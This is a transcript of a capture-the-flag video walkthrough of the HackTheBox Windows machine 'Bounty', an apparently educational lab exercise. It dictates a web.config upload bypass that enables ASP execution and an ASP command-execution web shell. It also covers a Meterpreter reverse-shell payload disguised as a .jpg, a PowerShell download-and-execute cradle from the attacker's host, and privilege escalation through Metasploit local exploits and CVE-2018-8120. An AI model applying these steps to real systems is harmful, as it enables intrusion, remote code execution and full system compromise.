Hey everyone, welcome to another edition of Can You Hack It? I'm Ben, and this week we are back on Hackthebox.eu. This time we're taking a look at a Windows system called Bounty. And so, as you can see here, the IP address of the system is 10.10.10.93. So if we just pop open our terminal, and we can run Nmap, and we'll do T5 to make the timing aggressive, SC and SV to enumerate scripts and versions, lowercase v to make it verbose, OA to output all formats, and then we'll write those to Nmap quick, and then finally the IP address of the box. So as we can see, the port 80 is open, which is web server. So while we're waiting for this to finish, we could actually pop open a browser. And we can take a quick look over there, 10.10.10.93, and see what we find. Looks like it says IIS 7, and then it loaded this picture. And so if we view the page source, looks like it's just a picture of Merlin, not a whole lot else here. My guess is this is actually the IIS start page, because we can see this alt text where it says IIS 7. So we can close this out. We could actually, I think, pull open this, take a look at network, do a reload, and see if it actually tells us which page it is. It doesn't. IIS start.html. HTML. Yeah, so it's an IIS start page. So if we pop back open to Nmap, we don't have anything else on the system besides that. So let's go ahead and get gofuzz running in the background to see what we can find. We'll use the standard word list, the dirbuster one. Share word lists, dirbuster directory 2.3 medium. Oops. And then we'll do T100 for 100 threads. We'll hide response codes of 404. We'll do extensions of HTML, ASP, and ASPX. This might actually be a little much, but we'll see how it works out. R to make it recursive, follow redirects, show full responses, and then of course the URL. And I screwed something up. Oh. Typo. And so while we've got that going, let's take a look back at our burp history and see if we see anything interesting from this request. So our response looks like IIS 7.5, which is server 2008 R2 or Windows 7. Does have .NET enabled. Outside of that, I don't see too much. So we can actually minimize that. So it looks like we found a page called transfer.aspx. If we go there, it looks like it's got a button for browse and an upload button. So if we browse and we'll go to Dropbox, Hackthebox, videos, Bounty. We've just got some random stuff we can send here. Let's send a bitmap. So bitmaps are an invalid file. Please try again. PNG. So it did allow a PNG, JPEG. Looks like it allowed a JPEG, and we've got a text file here. Doesn't allow a text file. Let's take a look back here and send this to repeater so we can play with it a little bit easier. So let's actually look at a different request. Let's look at the one of the ones that went through. Our JPEG went through, yeah, file uploaded successfully. So we send that one to repeater instead. And we take a look here and see we can figure out where this file's actually going. Let's browse, upload that again. Oh, actually, it looks like maybe we found where they go right here. So if we look at uploaded files, access is denied though. Let's try test.jpg. Okay, so it looks like we upload files. If they're successfully uploaded, they end up in uploaded files under their normal file name. It looks like it's just the image itself. It's not embedding it into a page or anything like that. So what we can try and do here then is we can see if we can figure out what all types of extensions this allows. And so actually let's send this JPEG one through to intruder instead of repeater. Positions, let's clear everything. Don't know that we necessarily need to change the actual file. In fact, we can test that in repeater real quick. Let's take one of the ones that failed. So this one failed because of an invalid file type. So if we change this txt to JPG without actually changing any of the contents, file uploaded successfully. So we should be able to just use intruder and simply modify this extension right here. So if we add that, and then we will go to payload sets and we'll just add a simple list that I have of some common file extensions. And those should be in this bounty folder under resources. And so you can see, let's actually remove this one at the top that's blank. HTML, some ASP, ASPX, PHP, Action, PY, EXE, DLL, ASCII. Actually, I don't know why ASCII was in there. Some of these, this was actually, this list was created by just parsing a few directories and looking at the extensions that were on files. So there is some stuff in here that doesn't make a ton of sense, but we can use it anyway. And so if we just go ahead and hit start attack, so this is our base case where it's left as JPG, and you can see that the length is 1350, and then in these failed cases, the length is 1355. So it looks like we're about halfway through now. We've got a few other ones that worked. So PNG, JPG, which we already knew, GIF. So it looks like mainly they're expecting image types. Config is allowed, which is interesting. Doc's allowed, docx is allowed. So out of those extensions, config, doc, and docx are the only non-image files. Doc and docx are probably not super interesting unless they were doing some sort of parsing of the document files after they're uploaded. Config could be interesting since we can upload stuff and we can browse it once it's uploaded. For those that aren't familiar with Windows, IIS uses something called web.config in order to configure the web server and the web application. And so if we can upload a web config, we may be able to do something like get a web shell. And so what we'll do to test that out is see if we can upload just a simple stock web config and be able to browse it. So if we go to, let's see, Microsoft web.config example. So we'll pull an example web config. And we've got one right here. So if we copy that, pop open Sublime Text, or actually we'll just do it in here. Vim web config. Paste that, save it. And so now if we just upload that through the uploader, This file uploaded successfully. I forgot what the directory was, uploaded files, and then it was web.config. And it says not found for some reason, so it's possible it didn't upload. Same thing, so for some reason we're not able to actually get to the file. And this is where something I've talked about before comes in handy, which is spinning up a VM that mirrors the machine you're trying to do as closely as possible. So in this case, at this point, we know we've got either Windows Server or Windows Server 2000, or sorry, Windows 7 or Windows Server 2008 R2. We've got IIS 7.5. So if we pop over to a VM that I have set up here, it's Windows Server 2008 R2, and it's got IIS on it. And what we can do is we can actually we can try and mimic what we're doing over there. So if we just pop open a folder, go to inetpub www, and this is where you would normally find web.config. And so what we can do is create a web.config over here, or mirror one, and see if we can actually see why it's not working. Copy and paste apparently isn't working either, which is fine. We can just Microsoft IIS web.config. Example. And save that, and we'll save it to the web root. Web.config. Make sure it didn't add an XML extension for some reason. Oops. It did. Okay, so now that we've got, our web config in there, we just try and browse to our local host. And so we get a 404. Here we get a little more information though, 404.8. And the reason is that the request filtering module is configured to deny a path in the URL that contains a hidden segment section. So what they're saying is that by default they filter out certain extensions, and .config is one of them. And so because of that, we're not actually able to load the web config. Now, luckily, there's a way we can work around this. If we just open our web config back up, what we can do is, since the web config controls the settings for the web application and the web server, is we can override some of those things like the filtering. So what we need to do is up here, let's see, we can just do it right here. We add a new section called system.webserver. And then we just add a section called security. File extensions. See if I can actually do this without screwing it up. Remove file extension is equal to .config. Close that off. Close off file extensions. Hidden segments, I think we can do too. I'm not sure. One of these may actually not be needed. Segments. And we'll do the same thing, remove file, or remove segment. Int equals web.config. And then we will close off request. Oh, I actually missed a spot, I think. Secure. Yeah. Request filtering. Oops. And so we'll close off request filtering now, and then we'll close off security. And finally, we'll close off the system.webserver. And so we save that, and if I didn't make any more typos, we should now be able to load it. And now we get a 404.3. The page we're requesting can't be served because of the extension configuration. So basically now they're saying that they don't have a MIME type that tells it how to handle this file. Luckily, because this is the configuration, we can add that as well. It's a little more complicated. It still goes within the system web server section, and then we want to add a handlers access policy is equal to read script. Actually, I don't know if they need some spaces. Script and write. And then add name equals web config. Path is equal to splat.config. Verb is equal to splat. Modules is equal to isapi module. Script processor is equal to, and this is going to be in the Windows directory, Winder system 32 inet srv, srv, and this is the asp.dll. Resource type is unspecified, I think. Specified, and require access is equal to write. And precondition is equal to bitness64. I think that's it. We can close off the handlers. Web server's already closed off. Save that, and hopefully we can see our web config now. We can. So we just get a blank page, which is fine. We can see if we can get execution in here. If we do something like this, which is just some ASP code, response.write, and we'll just have it do some sort of execution, 5 times 12. And then close that off. I think that should be sufficient. We can see 60 there, so that is executing. So now we're good to go, and we can start building a web shell. Let's pull this all back over real quick and see if it works on the real server. You won't see this, but I'm going to copy and paste it onto, well, I guess maybe you'll see part of it, onto my local system. I'll bring it into the window here to see if that helps. Copy and paste it over to my other VM. Sometimes going from VM to VM doesn't work very well. So Vim, actually let's just remove the existing one. And then Vim web config. And so we can see this one has our changes in it. So we'll rewrite that. And then if we upload it again, and then try and browse it. We see 60, so we're good to go there. Now all we need to do is start building in our web shell. This should actually be pretty simple. We can just use some, create a script shell, I think. So let's actually open this up in Sublime Text now. And then what we'll do is remove our spot down here at the bottom. We'll remove this response right, and we'll start writing our code in here instead. So I think we need to create a variable to hold our command, suser cmd, and then we will create a script object. So set oscript equals to server.create object wscript.shell. And then s user cmd is equal to request.form cmd. If s user cmd not equal to nothing, then response.write executing command s user cmd. I've got a typo there, which actually I don't think this is case sensitive, so it probably doesn't matter, but set o result equal to o script.exec cmd.exe /c and s user cmd. And then if you know what? These need to be dimmed also. O script, dim o result. And then finally, we need to create the HTML portion of the page. So if we just do HTML, body form action equals, we'll put some ASP code here. Request dot server variables URL method equals post. I'm just going to post it to itself. Input type is equal to text. Name is equal to .cmd, size is equal to 60, value is equal to s user cmd, and then another input type is equal to submit, and value is equal to execute. We can close off the form. Oh, sorry. Close off the inputs. Now we can close off the form. Pre-formatted, break. If is object result, then So what we're basically doing here is looking to see if there is a, if o result's not null, then we're going to write the contents of it out. So if we do response.write output and page break, paragraph on error, resume next, response.write o result.std out.read all, response.write error, and response.write o result.std error read all, and then finally end if. And then close off this script tag, and finally close off the body and HTML. So I think that should be all we need. So save it, and we will upload it. And we get an internal server error. So it's possible that we made a typo somewhere. I could either stare through here, or we could simply take this back over to our VM. Oops. Take it back over to our VM and take a look over there and see if we notice what's wrong with it. So we'll do that real quick. An error occurred on the server while processing the URL. Okay, so what we need to do now, this is actually something that I'd forgotten to mention, is take a look at IIS, and we're going to want to modify it so that we can actually see errors, because as you see there, it went ahead and filtered it out and replaced it with a nice friendly error that doesn't tell us anything useful. So if instead we go to IIS Manager, and we'll go to our website here, and we'll go to error pages. It actually looks like it gave us our error there. And edit feature settings. Oh, we actually can't right now because we've got a broken web config. Line number 56. Oh, so it's where I included the scripting block. Well, real quick, let's just cut this all out, save it, set it up so it gives us better errors. Error pages, edit feature, and do detailed errors. And then under, let's see here, there's one more spot under IIS. Debugging properties, I think. For some reason I'm not seeing it. Yeah. Debugging properties and send errors to browser. Set that to true. And so now we should be able to actually see specific errors instead of just getting that generic error. Let me reopen it just in case it actually made changes in there. Which it did. So now if we add this back at the bottom, save it, Okay, and so it looks like unterminated string constant. Oh, I see what I did. I put a quote where there shouldn't have been one, at least according to that, although it doesn't look the same in here. Executing command. Am I looking at the wrong spot? I am looking at the wrong spot. Okay. So if we do like a who am I? Okay, so it's working over here now. It's not pretty, but it works. So if we copy that, we'll move it back over into our Linux VM. Save it and upload it. So now we should be able to do a who am I over here. And we can see that we are on Bounty and our username is Merlin. So we've got access now to the file system. We can run commands. So since we know the username, we could try and do something like dir/a users Merlin desktop. And we could take a look and see what's on Merlin's desktop. There's the user.txt. We could actually read that through here probably if we just do PowerShell-c get content c:/users Merlin desktop user.txt substring 0 to 16. Close that off. Oops. Close that off. Looks like we lost our web config. I think this server clears the directory out periodically. So if we run that, we should be able to get back the first 16 of the user flag. If that doesn't work, we can worry about that once we get a shell. I just wanted to see if this actually works without a shell. Still doesn't get us our root flag, but it's just fun to do. It's taking a bit of time. And it looks like we got a timeout. So try and load it again. Looks like it was removed. We're having an issue connecting back to it. Let's disable burp for the time being. I wonder if somebody reset the system. 93. It's responding to pings. Seem to have made it not happy. So I reset the box. Let's see if it's a little more happy now. Uploaded. So actually, instead of trying to get the user flag through there in case that's what made it unhappy, let's just see if we can get a shell. So we'll use Metasploit to create a payload. Windows x64, meterpreter, reverse TCP. So we need to set the L host, which is 10.10.14.6. L port 4444, format is exe, and we'll output that to payload.jpg. And yes, I'm giving it a JPG extension. The reason for that obviously is so that we can bypass the filtering that they have on that upload tool. So we should be able to upload the shell, upload the payload, rename the payload, and then execute the payload. So before we do all that, let's get Metasploit fired up and ready to handle the connection if it comes back. So if we do use exploit multi-handler, and then we just set the payload to Windows x64, meterpreter, reverse TCP, and then we set the L host to 10.10.14.6. I think that's my IP config. Yeah. Set L port to 4444. Set exit on session to false. And finally exploit J. So now we're ready. So we just minimize that. And then we will upload our payload.jpg, and we'll upload our web config. Reload this page. We'll do, let's see, pwd. Just do dir, I guess. System Windows System 32 inet serve. So the uploaded files are probably going to be in the normal, let's see, dir c, in the normal inetpub folder. Yeah, inetpub. So if we copy that first things first, so we don't have to keep putting it up, especially if we lose this connection. So c:/inetpub www.root upload files payload.jpg, and we'll send that to his home directory. There's Merlin payload.exe, and the reason we're putting in his home directory is simply because I don't know if what his permissions on the server are, and so I don't know where else he's able to write for sure. We need to re-upload these, it looks like. Okay, and so that file is copied, so now we're safe there. Now if we just do a users Merlin payload.exe, and it's not returning, which is usually a good sign. So we can see that we got a session now. So if we do sessions-i, see we have session number 4. The reason it's 4 instead of 1 is actually because this is a continuation off the video that I was shooting yesterday. I didn't have time to finish it, and I had played with some stuff. So anyway, if we do session-i4 to interact with that session, sessions-i4, and we can do a shell, do system info, get some more information about this system. So it's Windows Server 2008 R2 data center build. It's set as a standalone server. It is 64-bit, running on VMware. So that's probably all the useful stuff that we would see in there. Let's see, so if we do, back onto this real quick, we'll just go to it directly, I suppose. Shell / users Merlin, and then desktop. And I'm not sure why we're not seeing. Ah, there it is. The user flag. So if we just do like a PowerShell -c get content / wrong quote, users Merlin desktop user.text substring. And so there you have the first 16 of the user flag. And so now what we need to do is just see if we can get a privilege escalation to get to administrator. So there's a few ways we can go about this. The first one we'll do is we'll run PowerUp and Sherlock and see what we get out of each of those. So I don't think I have it in here yet. So we'll do copy Dropbox tools PowerShell Power Tools PowerUp PowerUp.ps1, and at the same time we'll get Sherlock. Oops, man. By the way, I normally would recommend getting the latest version of these. I think these are only about a week old, but sometimes if you have ones that are older, they update these frequently, especially Sherlock, I think. And so it's good to make sure that you have the latest version. That way you're not missing anything. So now if we just run a Python web server here, and then we can pull them back on the box. So if we do PowerShell no P, which is for no profile, exec bypass, which is changing the execution policy to bypass in case they have it in one of the restrictive modes. An IEX new object, net.web client, download string. IP address of our box, and PowerUp.ps1, invoke all checks, which invoke all checks is the name of the function that we want to run. And so that is running. So far, nothing super interesting other than this unattended install script, which we will take a look at in a second. So we just do type. What we're looking for here is a password if it's stored. Which it doesn't look like it is. Password sensitive data deleted. So same here, password sensitive data deleted. So there's nothing super interesting in here then. So we will run Sherlock now. Copy the line from above and just change the end of it. Change this to Sherlock.ps1. And then I think it's, I don't actually remember, run all vulns or something along those lines. Cat Sherlock.ps1. Grep vuln. find all vulns. So that should take a second to run. And so that ran. And now let's take a look through it. It looks like it may be vulnerable to the task scheduler. This is one of the 0 days that Stuxnet used, I believe. Has to do with CRC32 collisions. Allows you to modify the file, and as long as the CRC32 is still the same, it doesn't realize that it's changed, and it'll run it. Client copy image Win32. I'm not actually familiar with this one. So that looks like the two that it finds there. And so what we'll do now, instead of using either of those, I'll show you another way that we could do it, because people have asked why I don't show how to do some of these things in Metasploit as much. And normally, since I'm not using Metasploit, that's part of the reason. Part of the reason is because I don't know that you learn as much, although in the case of just downloading a POC, compiling it, and running it, you're not really learning anything anyway. So what we'll do is we will background this, and we'll use a tool built into Metasploit to see what it finds. I think it's going to find the same too, most likely, but I haven't actually tried, so we'll find out. So we'll want to do, background this again, use multi-recon local exploit suggester. What did I mistype here? Auto completion should be working. Let's go back. Use multi-recon exploit suggester. And so if we show details, or sorry, show options. So we just need to set a session, which our session is 4. So we set session 4. And let's set show descriptions to true. Or description to true. By the way, I'll actually show this real quick. If I did set show descriptions to true, it would look like it worked, but when we ran this, it wouldn't actually show descriptions because that's not the proper name. That catches people sometimes is they mistype, and since it doesn't really care, it just sets a variable named show descriptions now to true. And so then if we just run it, now I think if you had used a 32-bit payload, you may need to upgrade to a 64-bit payload first, or it's possible that this will either miss stuff or misreport things. Should hopefully run fairly quick. So it looks like it's found a couple. One's the task scheduler one that we just talked about. Yeah, this is the 0 day from Stuxnet, and so it's basically like I described, where you're able to modify a task as long as you get a CRC checksum that's equal to what the original one was, which is pretty easy nowadays. The second one is an uninitialized stack variable in WMI's subsystem. I don't know if this is actually the same as the one that we found above with Sherlock. We can see if either of these work just by copying them. In fact, we'll make a quick list here. Try both of them just to see. So we'll start out with the WMI one. We'll do use show options, set session to 4, exploit. Now you'll notice the target actually says Windows 7. I think this works just fine on Windows Server 2008 R2 also. So I was able to do it, no session was created. Now this is actually a gotcha for some people. They'd give up at this point, it must not work. If we actually do show options again, we can now see that it's showing our payload options, and you'll notice that it actually populated our lhost with the wrong IP address. It used the local one. So if we set lhost to 10.10.14.6, and we'll set our L port to something other than since our other listener is currently running, L port to 4445. Now if we exploit again, and this time we get a shell. And so that's why you got to pay attention with Metasploit sometimes, is sometimes it won't show you the options initially because it builds the payload later. And when it's doing its stuff automatically, it chooses the wrong IP address to listen to. And so I think it's pretty common for people to sometimes stumble there, assume something didn't work, and move on. So who am I? Oops. We can see that we're system. So we just background this, and we'll try the other one. This is the task scheduler one. We use show options. Same thing here. Notice it's not showing the payload yet. If we do set session to 4, exploit, I think we'll get the same failure. Yeah, so same thing. Our exploit ran, but it didn't create a session. If we do show options, and again our lhost is set wrong, so set lhost 10.10.14.6, set L port 4446, and then exploit. And so actually this is a good time to be showing a lot of this stuff, because although, you know, Metasploit may not be the best thing to show you the details of how things work, there are a lot of gotchas to it that are good to show people. So hopefully you learned something there if you had experienced that before. And you can see here we got another session. This one's 6. So if we drop into a shell on it, who am I? We're also system. So in either case, we would be done here. We could get root. Just for fun, I will show you one final one. And this one actually wasn't found by Sherlock or any of the other tools that I ran. It's just happens to be one that I've seen fairly recently. I think it was discovered earlier this year. So I think a lot of the tools don't search for it yet. Let's see if I can remember the CVE. It's 2018, 8120. And so basically in the Win32K subsystem, there's a component that fails to properly handle objects in memory. And this allows us to do the same thing where we can privilege escalate to system. So I actually already have a compiled version of it. Main reason was just because I compiled it in Visual Studio, and I don't have Visual Studio set up in a VM where I can show it to you. So it is easier to just pull it over, which actually I think I can do in this meterpreter session. So if I do, although this is already system, let's do sessions, interact with 4, drop to a shell real quick. We can see that we're still Merlin in this one. So we'll background to that. We'll upload resources. I probably have to do the full path. Root, Dropbox, Hackthebox, videos, bounty, resources, CVE, and we'll drop that into users, Merlin, or we'll drop it into the Windows temp directory. Windows temp boom.exe. You can call it whatever you want, doesn't matter. So we drop to a shell, and now if we do like c:/windows temp boom.exe, who am I? And we can see that we are NT authority system. And so if we were to do something like call back our original payload, so ccolon windows temp boom.exe users merlin payload.exe, and we can see that we just opened a session 7 now. So if we background this and drop into session 7, and we can see here we're system, so we go to creator desktop. Oops. We can see the root flag there. So we can print it out the same way as we do with all the other ones. If we just do a PowerShell get content, there's administrator desktop root.text. Oh, I don't know why I said root.text and typed in root.exe. It is early in the morning. Did I seriously do it a second time? I don't know what my excuse there is. Oh, is my hand in the wrong spot? It's funny. And so there you have it, the first 16 of the root flag. So that's 3 different exploits that you could have used to get system on this box. I wouldn't be super surprised to see that none of them were the intended way. But anyway, so that's what you got. Hope you enjoyed the video. Hope you learned a little bit about Metasploit and some of the gotchas that you got to watch out for. Feel free to leave comments, like the video, or subscribe to the channel. And I will see you back here next week. Hopefully I'll have time to make another video. Have a great weekend, everybody.